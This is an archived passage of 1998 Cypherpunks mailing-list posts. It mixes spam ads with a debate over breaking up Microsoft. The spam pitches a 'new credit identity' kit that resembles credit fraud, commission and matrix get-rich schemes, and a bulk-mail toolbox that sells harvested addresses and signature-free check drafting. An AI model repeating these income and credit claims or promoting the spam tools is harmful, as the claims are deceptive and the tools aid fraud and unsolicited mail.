COULD START OVER WITH A CLEAN SLATE?  Maybe you just 
want a better way to protect your privacy.  

Many of us never realized the long-term effect that bad credit has on 
our lives.  In the computer age, many of these negative issues seem 
inescapable, and for good reason.  Fortunately, Credit Medic will 
rescue you from your past negative credit and open the way to a new 
life in the credit world.  By creating an entirely new credit file, you can 
obtain the credit you deserve.  This powerful program will explain how 
you can create a new credit bureau file that will give you the opportunity 
for new credit.  

People lose their credit privileges for any number of reasons.  In our 
society, it's very difficult to live without good credit.  Regardless of 
your past credit history, this program will show you how to regain good 
credit.  But you will get more than that.  With good credit comes high 
self-esteem and self-worth.  You will be better able to take care of 
yourself or your family and enjoy the things you deserve.

Credit Medic will walk you through this process step by step.  It will 
take some energy and focus on your part but the rewards will be well 
worth the effort.  By creating a new credit file, the Government allows 
you a second chance at getting the credit you deserve.  Thousands of 
people who have used this program have achieved success in releasing 
themselves from the exasperating stranglehold of bad credit and moved 
on to having outstanding credit.

Understand that there is absolutely no reason for you to believe that it is 
impossible for you to release yourself from your past negative credit and 
move on to excellent credit!  

The process is very simple, but it is important to be dedicated and to 
follow through with all details.  You must also be patient, some steps 
take longer than others.  Don't be fooled into thinking that this is a 
miracle quick fix.  This method will require some work on your part.

What's important to realize is how the Government and the 
CRAs (Credit Reporting Agencies) identify you and list all of your past 
and present credit information.  Credit Medic will show you how to 
apply for new credit identification.  This creates a whole new credit 
identity, that runs parallel (but never crosses) your existing credit.  

This program doesn't require that you repair your old credit file, although 
it's a good idea for many obvious reasons.  This is your decision to make.  
Credit Medic isn't loaded with fluff or filler material.  Everything in this kit 
is important!  You will find out about rights that you probably didn't know 
you had.  Remember, you deserve good credit.  Follow the program carefully, 
and you will be successful!  

Credit Medic will give you a second chance for credit.  It will also be your 
last chance.  You must understand that you only get ONE (1) second 
chance.  If your credit is damaged again, Credit Medic cannot help you.  

Credit Medic is a PROVEN method that REALLY WORKS if you follow 
the steps described.  Credit Medic DOES NOT do the work for you, but 
it DOES give you COMPLETE detailed instructions for building NEW 
credit.  

DON'T PROCRASTINATE!  YOU DESERVE GOOD CREDIT!  ORDER 
by June 10th and receive 50% off the regular price of $39.95.  NOW 
ONLY $19.95 if your order is postmarked by July 10, 1998!  













Please print and fill out the following order form:

----------------------------------------------------------------------------
ATTN: Please type or print legibly to ensure proper delivery.

Name______________________________________________________

E-mail Address (Required for E-Mail Delivery--U.S. Postal Delivery $5.95 extra)

__________________________________________________________

Address

__________________________________________________________

__________________________________________________________

__________________________________________________________

Phone #______________________

PLEASE CHECK ONE:

_____ E-Mail Delivery  _____ U.S. Mail

$_19.95_  CREDIT MEDIC SECRETS (If postmarked by 7/10/98)      
$_______  Sales Tax (CA residents add 8.25%)
$_FREE_  E-Mail Delivery (you must include an e-mail address which accepts large attachments)
$__5.95_  Postal Delivery (Only add this amount if you want Credit Medic delivered by U.S. Mail)
$_______  Order Total                          

PAYMENT BY (US FUNDS only!):

 ___ Personal/Business Check ___ Money Order ___ Cashier's Check

PREFERRED FORMAT (Please check one or more of the following):

___ ASCII ___ Microsoft Word ___ Zipped

*If none of these three formats are acceptable, please order for delivery 
 by U.S. Mail.  You must include the additional $5.95 shipping & handling fee.  
The complete kit will be mailed in printed form.  

**If you're ordering from outside the USA, only a Money Order in US 
 Dollars will be accepted.  No postal delivery is available outside the 
 USA, so you must include your E-Mail address accurately and legibly.  
 If you do not currently have an E-Mail address, please get permission 
 to use a friend's.

--------------------------------------------------------------------------------------

Please make payable to ->  BWZ Publications 
and send to:

Credit Medic
21755 Ventura Blvd.
Suite 455
Woodland Hills, CA 91367
USA





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: q4ix@worldnet.att.net
Date: Sun, 28 Jun 1998 01:25:58 -0700 (PDT)
To: dvbc52gtp47@generalnet.com
Subject: Earn $100 every time OUR phone rings...
Message-ID: <QQevrt14291.199806280824@smtp0-alterdial.uu.net>
MIME-Version: 1.0
Content-Type: text/plain



ALL YOU DO IS ADVERTISE THIS 800 NUMBER! THAT'S ALL!! 

$100 goes to you for EVERY sale that the company closes!

Does the idea of making at least $1,000 per week beginning your 2nd week of 
doing business excite you? 

How about never having to sell a thing to your customer and never having 
to talk to ANYONE to make money? I don't know how this could get any easier.

EVERY aspect of selling or talking to someone is DONE COMPLETELY by the company!  

The number one home based business for the 2nd year in a row, Fortune 5000 
is a member of the Better Business Bureau and the U.S. Chamber of Commerce.

WHAT THIS BUSINESS WILL DO FOR YOU:

* Handles all your calls, closes your sales, and 
  sends you WEEKLY commission checks! 

* It pays you a $100 commission (that's over 50% of the total sale)
  for EVERY sale. CHECKS put $$$ in your pocket in less than your first 
  week or two... Quick commission earnings build and maintain motivation. 
  ALL YOU DO IS ADVERTISE the toll-free number and your ID number. 

* You can get STARTED TODAY. Just advertise the business toll-free 
  number with your ID # and let this business CLOSE YOUR SALES every day...
  They do all the work and YOU GET PAID FOR IT! 

* You may advertise any way you choose: Bulk E-Mail, Flyers, Classifieds, 
  Postcards, etc. Suppose you use bulk E-Mail, as I am: 100,000 E-Mails
  with a 1/10th of a percent (0.1%) sales rate at $100 per sale nets 
  $10,000... not too bad.

There is nothing else out there that will provide you with an immediate income 
beginning THIS WEEK with minimal effort.

Before you call, I want you to think about the quality of the live 
operators handling your call. I am convinced you will not find 
a better team of closers for your own personal sales.  You will 
clearly understand what I am talking about once you call.  

PLEASE DON'T LET THIS PASS YOU BY. MAKE THE CALL!!

1-800-811-2141

You will be asked for ID #50030 when you call.

(Live operators are available from 8 AM-10 PM CST Monday through Saturday and 
will be able to answer any questions you may have.)

Call one of the 24hr TESTIMONIAL lines at 888-703-5389, 888-446-6949, 888-446-6951
or 888-731-3457 (all toll free). 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hihe57@texas.net (Cherry Pit)
Date: Sun, 28 Jun 1998 10:52:38 -0700 (PDT)
To: hihe57@texas.net
Subject: New Web Site
Message-ID: <19980628206FAA56484@post.pge.com>
MIME-Version: 1.0
Content-Type: text/plain


Cherry Pit



Check Out My Free Adult Site with Lots of Pictures




http://209.215.147.9/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Sat, 27 Jun 1998 18:25:41 -0700 (PDT)
To: (Recipient list suppressed)
Subject: New on-line moderated forum for Pauline Hanson's One Nation
Message-ID: <1.5.4.32.19980628010014.00a78dbc@mail.pronet.net.au>
MIME-Version: 1.0
Content-Type: text/plain


G'day One Nation supporter in NSW

Pauline Hanson's One Nation now has its own moderated discussion group on-line.

You may participate by requesting a unique username and password from GWB by
reply email.

The URL for the discussion board is:

http://plato.cc.adfa.oz.au/auspolitics/

Follow the link to Pauline Hanson's One Nation discussion group in the frame
on the right.

The purpose of the discussion group is to discuss One Nation policy, issues
and brain storm.

Please not IT IS a moderated discussion group and any offensive posts will
result in the poster being taken off the forum.

GWB



Scott Balson






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sun, 28 Jun 1998 18:28:58 -0700 (PDT)
To: jy@jya.com
Subject: Just clicked on http://www.jya.com/crypto.htm
Message-ID: <3596ED18.890@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Sunday 6/28/98 7:12 PM

John Young

Just looked at http://www.jya.com/crypto.htm

usa062698.htm      Payne v. NSA: US on Classified NSA Declaration   
June 27, 1998

usa062298.htm      Payne v. NSA: US Motion on FOIA for NSA Algos    
June 27, 1998

See you got the Saturday fax.

Dinner is ready, said Patty.

Glad you enjoyed the hat I sent you  ...

FLASH

Patty just called me to dinner.  Patty yelled J Orlin Grabbe!

J ORLIN GRABBE appeared on 60 Minutes. http://www.aci.net/kalliste/

Leslie Stall was critital.

Watched remainder of 60 minutes.

For the record, Patty is my SAME wife since 1962, 

  Implementing Basics : How Basics Work
  by William H. and Patricia Payne

 
http://www.amazon.com/exec/obidos/subst/home/home.html/002-8309979-0236834

Patty and I met John Gilmore http://www.cygnus.com/~gnu/
and his girl friend Cindy for dinner in about October.

It took about 15 minutes for Patty and I to discover if Gilmore and his
girl friend were of THE SAME SPECIES.

I am a TOTAL CONSERVATIVE.  

I FINALLY saw J Orlin Grabbe on 60 Minutes tonight.

http://www.aci.net/kalliste/speccoll.htm
http://www.aci.net/kalliste/nukearse.htm
http://www.aci.net/kalliste/sandcryp.htm

Looks like he may be from a different spicies too.  

But from our minds, Gilmore, Grabbe, and LOTS OF YOU
think the same thoughts.  

And likely John Young too. Good ones.  No evil.

I need to collect my thoughts after seeing 60 minutes tonight.

Best 
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ivestheis@aol.com
Date: Sun, 28 Jun 1998 17:27:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: tell me about digi cash if you know about it
Message-ID: <121815ca.3596df68@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks here is my phone 502 961 0332
Name Ives Aidan Sandol




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <amainfo@amazonmall.com>
Date: Sun, 28 Jun 1998 21:49:23 -0700 (PDT)
Subject: Internet Success Toolbox
Message-ID: <989.283923.42380 amainfo@amazonmall.com>
MIME-Version: 1.0
Content-Type: text/plain


We do not wish to send e-mail to anyone that does not want 
to receive it. To be removed from this list: Send an e-mail to:
amainfo@amazonmall.com  and type "remove" in the "Subject Line" 
You will be promptly removed from our database. 
................................................................
.....
"THE INTERNET SUCCESS TOOLBOX"

The Most Complete Marketing Software Package Available Anywhere!

This is what you will receive on CD-ROM:

1. Submission Spider Program (Optional - value $99.90) 
The NEW and IMPROVED Strut Your Stuff Submission Spider 
Program! Now automatically submitting to 500 Search Engines 
and Directories! We believe you'll find this product to be 
a vast improvement over the Older Spider program The Strut 
Your Stuff Search Engine Submission Software will automatically 
submit your site to 500 search engines, directories and link 
sites. The software is extremely easy to use.

Register and Submit your web site to ALL major internet search 
engines and directories in less than 45 minutes! Increase 
your web site's visibility to webcrawlers, spiders, indexers 
and worms. Boost and track your web site's search engine ranking.

2. Stealth Mass Mailer ($399.00 value) - This unique, first of 
it's kind - software that allows you to easily send 250,000 
e-mail 
messages an hour. Simply enough by making a single 
connection to the Internet using a standard modem, and connecting 
to
either 20 different mail servers, or a single mail server 20 
times.

This, easy to use, software is designed for the basic computer 
user to understand. It's as easy as imputing the mail server, 
selecting the list of e-mail recipients to send to, inserting 
your 
e-mail address, adding your subject line, selecting your sales 
letter, and pressing send.

3. E-Mail Pro Extractor ($350.00 value) - This one of a kind 
software 
program is designed to manage and clean up any list of e-mail
addresses. It will purge duplicates, manage removes and delete
undeliverables. It will also separate and categorize your list of 
e-mail addresses by domain names.

The E-mail Pro Version 4.0 Bulk E-mail Loader also imports simple
text files that anyone can download from AOL, CompuServe, the
Internet, etc...These text files contain classified ads, forum 
messages, or data from the member directory. Each of these 
files are filled with e-mail addresses.

4. Check Deposit System ($125.00 value) - Check Deposit System 
Version 2.1 is a state of the art, revolutionary software that 
allows
you to easily and legally process checks by fax, phone or 
Internet.
The customer's signature on the check is not necessary. 

5. 16 Million E-mail Addresses ($149.00 value) - We took a total 
of 
over 92 million e-mail addresses from many of the touted CD's 
that 
are out there (bought them all - some were $300+)! We added the 
millions we had in storage to those. When we combined them all, 
we had in excess of 100+ million addresses in one huge file.

We then ran a super "sort/de-dupe" program against this 
huge list. It cut the file down to less than 25 million!! 

We then ran a program that contained 150+ keywords to 
remove addresses with vulgarity, profanity, sex-related 
names, postmaster, webmaster, flamer, abuse, spam, 
etc...Also we eliminated all .edu, .mil., org., gov., etc...
After that list was run against the remaining list, it
reduced it down to near 16 million addresses!

So, you see, our list will save people hundreds of 
dollars buying all others that are out there on CD. Using
ours will be like using the 100+ million that we started with, 
but a lot less money and a lot less time!

If you order "The Internet Success Toolbox" for $495.00
within the next 7 days, you'll also receive the following 
awesome bonuses absolutely FREE. 
A value of over $400.00 !!!


-----------------------------------------------------------------
-

To order: Fill out, copy and fax this order form to: 
(425)379-9722

or send Check to:
SYS
11014 19th Ave SE Suite 305
Everett, WA 98208

Questions: (425)338-9491

We accept Visa, MasterCard or Check.

____ YES! I'm bursting with anticipation! Please send me "The 
Internet Success Toolbox" so I can start advertising my business 
to 
"millions of people" - absolutely FREE! I'm anxious to see how 
others 
are creating immediate "cash-flow explosions", and eliminating 
most of 
their advertising and marketing costs - and how I can do the 
same! 
Enclosed is $495.

____ YES AGAIN! Because I'm responding within 7 days, I will 
receive 
5 BONUSES with a total value of $488.90 - absolutely FREE! They 
include: 

BONUS #1 ($39 value): "Search Engine Secrets" - Discover the Most 
Powerful and Proven Strategies that really work to place you at 
the Top of
the Search Engines!

BONUS #2 ($195 value): A FREE one year subcription to "The 
Internet
Success Toolbox Newsletter" - my ticket to marketing and 
internet cash flow heaven! 

BONUS #3 ($39.95 value): Your Hotline List of "7000 Free 
Classified 
Ad Sites on the Internet" - a virtual GOLDMINE! 

BONUS #4 ($39.95 value): A FREE Special Report titled "How to Put 
Your 
Business on Automatic Pilot and Turn Your Marketing System Into a 
Predictable, Turnkey, Cash-Flow Machine That Keeps on Working - 
Even 
When You Don't!!" 

BONUS #5 ($175 value): Order within 7 days and I'll also throw in 
a 
FREE VACATION CERTIFICATE good for 3 days and 2 nights of FREE 
lodging at one of over 30 "premier" resorts.

Some vacation spots you can choose from include: Hawaii; Orlando, 
FL; Las Vegas; Atlantic City; Palm Springs; Aruba - in the South 
Carribean;
Cancun, Mexico; and many, many more!

Hey, when you start making a TON of money, you'll wanna do some 
celebrating, won't you? So start packing those bags!

That's it. A lot more than you bargained for isn't it?

When you total all the goodies up, you're looking as a total 
value of 
$488.90! All yours - absolutely FREE - with your purchase of our 
amazing
package "The Internet Success Toolbox " for only $495.00.

And I'll even pay for shipping your package. 

Anyway, I have a copy right here on my desk reserved for you. All 
I need 
is your go ahead and I'll rush it out to you along with your 5 
FREE BONUSES. 



Name _____________________________________________________

Street Address ____________________________________________

City)__________________State_______Zip_____________


Phone # (_____) ___________________________ 

Fax # (______) _____________________

E-mail Address _________________________


___Visa ___MasterCard___Check

___Include the Submission Spider $495.00

___Don't include the Submission Spider $395.00

Total:$________

Account Number_____________________

Expiration Date____________________


I understand that all sales are final.


____________________________________
Signature


Fax order to: (425)379-9722
To order by check:
***********************************************************

Tape or paste your check here
Fax it to us at: 
You do not need to send a hard copy of your check.
The fax is all we need.

Make check payable to: S.Y.S.

(We are able to perform this service using our
Check Deposit System Software)

************************************************************


* Orders by Credit Card are shipped IMMEDIATELY.
Fax completed order form to: 

* Orders by personal, business or credit card CHECK are shipped 
in 7-10 
business days.


 
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <operator@theshopcenter.com>
Date: Mon, 29 Jun 1998 01:58:47 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Cheapest Long Distance...As Low As 4.9cpm!!
Message-ID: <989.283923.711042 operator@theshopcenter.com>
MIME-Version: 1.0
Content-Type: text/plain


LOWEST LONG DISTANCE RATES...AS LOW AS 4.9CPM!!!

Join This Incredible Wholesale Card Club for ONLY $35.00 And You 
Not Only Get A 96min. Phonecard, But You Also Can Purchase Them 
At Incredibly Low Rates!!

This Membership Also Puts You In Our Mega Money 2x3 Power 
Matrix....
And You Never Have To Sponsor Anyone Ever And Your Matrix Will 
Fill And You Get Paid..

Daily Payout!!
Only 14 Sales = A Cycle!!
Unlimited Cycles Daily!!
Absolutly No Wash!!
Earn $200.00, $600.00, OR $1800.00 per cycle or ALL THREE 
UNLIMITED TIMES DAILY!!

AND Get The Lowest Phone Cards Rates In History...and Incredible 
International Rates Too!!

CALL 1-800-600-0343, EXT.2700 FOR BRIEF OVERVIEW AND ANOTHER 
NUMBER TO SIGN UP RIGHT NOW OVER THE PHONE AND LEAVE ME 
YOUR CONTACT INFORMATION AND I WILL CALL YOU BACK FIRST!!
BE SURE TO WRITE DOWN THIS ID#3299 as you can not sign up without 
it.

You may also reply back to <mailto:phonecards@theshopcenter.com> 
with "LOWEST Long Distance" in the subject
and you will automatically receive some more information.

If you would like to be removed from any further mailings, then 
please <mailto:remove@theshopcenter.com.>
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matt Harlow" <m_harlow@villingandcompany.com>
Date: Mon, 29 Jun 1998 23:31:33 -0700 (PDT)
To: "Matt Harlow at home (E-mail)" <mattharlo@qtm.net>
Subject: Marketing, Advertising & PR Forum
Message-ID: <001401bda318$509c3900$58062bd1@mattharlo.qtm.net>
MIME-Version: 1.0
Content-Type: text/plain


I recently started a mailing list for the marketing, advertising and PR
industry.  We've already got over 100 subscribers from all over the globe.
The conversation is really flowing now and we're ready to expand.  So far
we've have touched on office politics, how to's, compensation and critiques
of national campaigns, job openings and a whole lot more.  We'd love to have
you on board.

All you need to do to sign up is send an email to the address:
requests@mail.villing.net with the subject of:
	SUBSCRIBE DIGEST MATT to receive the a daily digest or
	SUBSCRIBE MATT to receive individual emails

Also, please do me a favor and copy me at M_harlow@villingandcompany.com if
you sign up.  That way I know to add your name to the roster.

Hope to see you at the forum!  We're getting some great exchanges and I'd
love to get you in on them.

Feel free to pass this message on to anyone you feel might be interested in
the group.

Sincerely,
Matt Harlow

P.S. If you're already signed up or if I've recruited you before, Sorry!
It's tough to recruit for a project like this and sometimes I get a name
twice in my efforts not to miss anyone.

Matt Harlow
Account Executive
Villing and Company
3900 Edison Lakes Parkway, Suite 100
Mishawaka, Indiana 46545
Work: Email: m_harlow@villingandcompany.com, Phone: 219-277-0215, Fax:
219-277-5513
Home: Email: mattharlo@qtm.net, Phone: 616-683-2599, Fax: 616-684-4765







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 29 Jun 1998 06:52:40 -0700 (PDT)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Re: saving the world from a cancerous monopoly
Message-ID: <199806291404.KAA16743@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Jun 1998 11:31:43 +0000 (GMT), attila wrote:


>	I am not in favour of the government meddling in the design
>	or integration of M$ products...  but:
>
>	the Sherman Act, passed in 1890 is designed to level the 
>	playing field, not regulate/administrate. the real issue 
>	of the act is that it acts _in the interest of society_ 
>	to curtail monopolistic and anti-competitive actions and
>	excesses  --M$ certainly qualifies for the remedies far
>	more than John D. Rockefeller's Standard Oil did in 1908.

That is B$, i.e. pork barelled gold plated bullshit!  Standard Oil story was simply some 
businessmen whoring to politicians whoring to businessmen.  But what a price did we pay for 
that!

The Sherman Act is simply another appropriation of market by physical force, made morally 
acceptable by legislating it.  

When a country legalize the use of force for profits, their citizens will suffer the 
consequences sooner or later.

Ciao

jfa



Jean-Francois Avon, Montreal QC Canada
"One of theses centuries, the brutes, private or public, who believe
that they can rule their betters by force, will learn the lesson of
what happens when brute force encounters mind and force."
                                              - Ragnar Danneskjold
PGP key at:    http://bs.mit.edu:8001/pks-toplev.html
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Mon, 29 Jun 1998 11:20:37 -0700 (PDT)
To: attila <cypherpunks@toad.com>
Subject: Re: saving the world from a cancerous monopoly
In-Reply-To: <Pine.BSF.3.96.980629113011.281C-100000@hun.org>
Message-ID: <3.0.5.32.19980629095745.009bbae0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:31 AM 6/29/98 +0000, attila wrote:
>	there is only one _sane_ course of action against M$:
>	divestiture  --before Gates becomes the Hydra.  [...]
>	the real issue is not the 90% of the OS market, it is the
>	95% (expected to grow to 98% before 2000) of the office s/w.
>	the office software, available _only_ on M$ platforms 
>	creates a self-perpetuating juggernaut: no other OS can
>	even begin to make market penetraton without the key
>	product (office s/w) --and people are not willing to
>	learn a new application-- that's just human nature.

Attlia - you'd probably enjoy reading
	"Barbarians Led By Bill Gates",
a recent book by some MS ex-insiders on how MS became what it is.
Windows 3.0, for instance, wasn't supposed to muscle out OS/2,
but the developers of Word/Excel/Powerpoint (which they originally
wrote for the Macintosh) got better development/porting support 
from the small group of developers on the low-status backwater
leftover Windoze team than from the high-profile IBM OS/2 partnership,
and Win3.0 was ready to ship when they were, unlike the upcoming
insanely great next version of OS/2.  When it sold a million copies
in a few months, Gates had to deal with it, and suddenly Windows
became a strategic product again, and gradually OS/2 became the leftover.

>	is using his cash cow, swollen by gouging the consumer, to

Gates has only gouged consumers by selling us crap which we buy,
either because we need compatibility with other users of their products,
or because we work for big companies who have centralized decision-
making droids who buy it.  

Better than Gates tells my corporate droids what to buy than Janet Reno,
Louis Freeh, or FCCmeister Kennard.  Not only do they have even less taste,
but they'd solve the problem by taking a long time to do the spec,
which wouldn't have enough details to interoperate with anything except the
National Information Infrastructure Data Entry Escrow Protocol.

Personally, I disliked WordPerfect immensely
(though I last used it back when it and MSWord were character-based),
and Word has acquired enough features to be about as flaky and 
unpredictable as WP was back then.  Excel is friendly, and I don't use s
preadsheets enough to prefer something else.  Powerpoint reeks,
and the integration between Word and Powerpoint reeks badly.

>	acquire _significant_ interests in industries which use
>	computers: cable networks, cellular networks, satellite 
>	networks, etc. and related industries dependent on 
>	communications: news (MSNBC), television, productions, 

Good for him - would you rather he spent the money acquiring 
other parts of the software industry or Seattle real estate?
He also spent a pile of money trying to outflank the Internet with MSN,
and lost badly.  Are you still running Microsoft BoB?


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harvey Rook (Exchange)" <hrook@exchange.microsoft.com>
Date: Mon, 29 Jun 1998 10:39:33 -0700 (PDT)
To: cypherpunks <cypherpunks@toad.com>
Subject: RE: saving the world from a cancerous monopoly
Message-ID: <2FBF98FC7852CF11912A00000000000108A78AC5@DINO>
MIME-Version: 1.0
Content-Type: text/plain


From: attila [mailto:attila@hun.org]
> 	1.  M$' base operating system must be fully defined; eg-
> 	    the API interface must be made available to all. if
> 	    the API is not a moving target, emulators can be 
> 	    written enabling native WinTel s/w to run correctly
> 	    on other platforms (unix variants, OS/2, beos, apple,
> 	    etc). the increasing CPU "horsepower" makes this 
> 	    approach at least feasible.
> 	    
How do you plan on accomplishing this? The courts have said that they will
not design computers. Since freezing an API is tantamount to computer
design, this isn't going to happen any time soon.

More generlly, API's only freeze when the system is dead. Windows has, for
better or for worse, many years of life left in it. This means one way or
the other, MS will extend Windows as it needs. For them, freezing Windows
would be killing one of their cash cows.

> 	2.  M$ must be required to port it's major products to
> 	    other operating systems; it is worth noting that 
> 	    freeBSD, for instance, will run native binaries from
> 	    Linux and SCO variants which simplifies on set.

This is also very difficult to implement. How do you choose what OS/s to
port to? If MS can't expect to earn a profit from the port, then MS is
dumping software, which is not legal. Why choose x86 UNIX's (less than 10
million users) Why not MVS (more than 20 million users)?

Attila, I think you're jealous, and confused by MS's success. You don't
understand why someone would choose Windows (NT or 98) when OS's are
available that have a better core. And you desperatly want to change that.

Some terrible truths...

#1 Only MS, and Apple know how to make and OS that the mass market wants.
Apple unfortunatly doesn't know how to make hardware that the mass market
wants. 

#2 If people made decisions rationally, advertisements would consist of
nothing but readings from Consumer Reports.

#3 The typical computer user is getting less, not more intelligent. If an
x86 unix is to gain mass market popularity, it must become vastly more
usable. Most people don't know and don't care about the internals of the OS.
They don't want to think about it. They just want their documents and games
to be there when they click on them, and they want to surf the internet. Not
that Windows is perfect for usability, but it's a hell of a lot better than
UNIX.

But enough of this... this is cypherpunks, not alt.bash.microsoft. 

Take a peek at my email address if you want to see my bias.

ob cypher... I've got a validated C++ implementation of RC-6 email me if
you'd like a copy of the source.

Harv.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Mon, 29 Jun 1998 08:17:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Premail (and Replay)
Message-ID: <51a3bf4e.3597affc@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 6/29/98 6:31:46 AM Central Daylight Time, nobody@REPLAY.COM
writes:

<< Anonymous #49812 wrote:
 > On 28 Jun 1998, Secret Squirrel wrote:
 >
 > > Also, remailer@replay.com appears to have been deleted. The 'remailer'
 > > user is unknown.
 > 
 > That's correct. I don't know what happened.
 
 Oh, really? >>

ROFLOL!

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Mon, 29 Jun 1998 04:31:51 -0700 (PDT)
To: cypherpunks <cypherpunks@toad.com>
Subject: saving the world from a cancerous monopoly
Message-ID: <Pine.BSF.3.96.980629113011.281C-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain


	there is only one _sane_ course of action against M$:
	divestiture  --before Gates becomes the Hydra.

	to make it short: at 90% of the OS market, and 95% of the 
	current	office software (w/p, spreadsheet, database, etc) 
	market worldwide, M$ _is_ in a position of total market 
	dominance.

	the real issue is not the 90% of the OS market, it is the
	95% (expected to grow to 98% before 2000) of the office s/w.
	the office software, available _only_ on M$ platforms 
	creates a self-perpetuating juggernaut: no other OS can
	even begin to make market penetraton without the key
	product (office s/w) --and people are not willing to
	learn a new application-- that's just human nature.

	it will take two technical factors to make M$ subject to 
	market pressures and responsive to further competitive
	innovation (and this involves extensive ongoing regulation
	and oversight which I consider anathema):

	1.  M$' base operating system must be fully defined; eg-
	    the API interface must be made available to all. if
	    the API is not a moving target, emulators can be 
	    written enabling native WinTel s/w to run correctly
	    on other platforms (unix variants, OS/2, beos, apple,
	    etc). the increasing CPU "horsepower" makes this 
	    approach at least feasible.
	    
	2.  M$ must be required to port it's major products to
	    other operating systems; it is worth noting that 
	    freeBSD, for instance, will run native binaries from
	    Linux and SCO variants which simplifies on set.

	    as a corollary, M$ must be required to support some 
	    of the non-Intel hardware ports such as freeBSD or 
	    Linux on Alpha (almost 5 years ago, Alpha was at the 
	    performance level of the current Intel 400 Mhz). M$
	    does support Word and Explorer on Apple, but major
	    features were not ported in both instances --this is
	    not acceptable.

	I am not in favour of the government meddling in the design
	or integration of M$ products...  but:

	the Sherman Act, passed in 1890 is designed to level the 
	playing field, not regulate/administrate. the real issue 
	of the act is that it acts _in the interest of society_ 
	to curtail monopolistic and anti-competitive actions and
	excesses  --M$ certainly qualifies for the remedies far
	more than John D. Rockefeller's Standard Oil did in 1908.

	Bill Gates, through his _total_ dominance of the desktop, 
	
	  (with exceptiom of a few of the hardheaded/stubborn who
	  refuse to run _any_ M$ products (author included))

	is using his cash cow, swollen by gouging the consumer, to
	acquire _significant_ interests in industries which use
	computers: cable networks, cellular networks, satellite 
	networks, etc. and related industries dependent on 
	communications: news (MSNBC), television, productions, 
	etc.

	this horizontal and vertical spread of M$ is even more 
	dangerous. Bill Gates is quickly approaching critical mass
	--Bill Gates could literally bring the world to its knees--
	and Gates is a notorious control freak: there is Bill's
	way, there is Bill's way, there is...    sorry, there is
	no other way.
	
	unless the DOJ shows some spine, particularly in light of
	the appeals court ruling dumping the injunction _and_ the
	special master (which is far more critical than the public
	perceives, which is why M$ went after Lessig), the DOJ is
	going to be in and out of court with M$ until M$ literally
	buys the government or intimidates the DOJ out of the deal.  

	the scenario of forcing M$ to accommodate other OSs and
	hardware platforms might be workable, but Gates will not
	only fight it, but it will be a constant additional legal
	burden to force M$ to make the services available in a
	timely manner; in other words, the government will end
	up establishing an agency the size of the FCC just to
	regulate M$ the "controlled" monopoly (as Sen. Hatch
	threatened).

	nothing in American law says we can not have a regulated 
	monopoly if it serves the public interest --AT&T provided 
	superb and universal service for decades (many of us would 
	love to have that service today), but AT&T did _not_ 
	innovate in a timely manner at the market demand. and
	telephones are rather low tech compared to computers
	which have been subject to Grove's Law for two decades.

	M$ has not been a creative company --it is a marketing
	and control machine which acquires technology, often by
	less than socially acceptable means, and integrates it
	into M$' market offerings. credit must be given to M$
	for making the PC ubiquitous, but that value starts to
	wear very thin with M$' current market domination.

	from the perspective of serving the future interests
	of our society, the only effective option for the DOJ
	is to litigate for the divestiture of M$ into several
	operating companies --and to prevent Bill Gates from
	owning or controlling more than one division --much
	on the line of the AT&T divestiture.  

	anything less will mean continuing litigation and further
	dominance of Gates as he uses his enormous cash reserves 
	to buy control in additional markets. likewise, the orders
	must prohibit Gates from further market horizontal and
	vertical "octopussing".  

	the Sherman Act also permits market damages (M$' 50-80% 
	gross profit margin certainly qualifies as gouging) 

	    --which are then trebled; 

	that would put a cramp on Bill's $50 _billion_ net worth 
	and probably force even further divestiture of his 
	controlling stock interests.

	Gates' personality needs to be considered as a factor
	as he must control, totally control. it is not enough
	to be first in a market, he must be the only player in
	the market.  

	Gates' tactics have been deplorable: his minions go forth to
	companies and say: "...we dont know whether to buy you out, 
	or force you out..." and if the company is purchased, it is
	purchased for much less than potential or fair market value.  

	Gates does not buy just the leader, he buys outright, 
	or controls, _all_ of the players in an emerging technology
	so there will be no competition to the direction chosen for
	inclusion in the M$ product line --and the choice may not 
	be the best choice...  the market is stifled.

	unfortunately, Bill Gates is a cancer on society. it is
	the old story: deal with it today, or deal with it later
	when Gates has become an even more cash bloated and
        arrogant monster which has devoured more of societies' 
	rights and destroyed even more of the worlds' technical 
	infrastructure.  

	Bill Gates is not going to mellow with age; if anything,
	he will get more difficult. the world will be in less of
	a shock knocking the pins out from under Gates now rather
	than later.

	    attila out....
__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
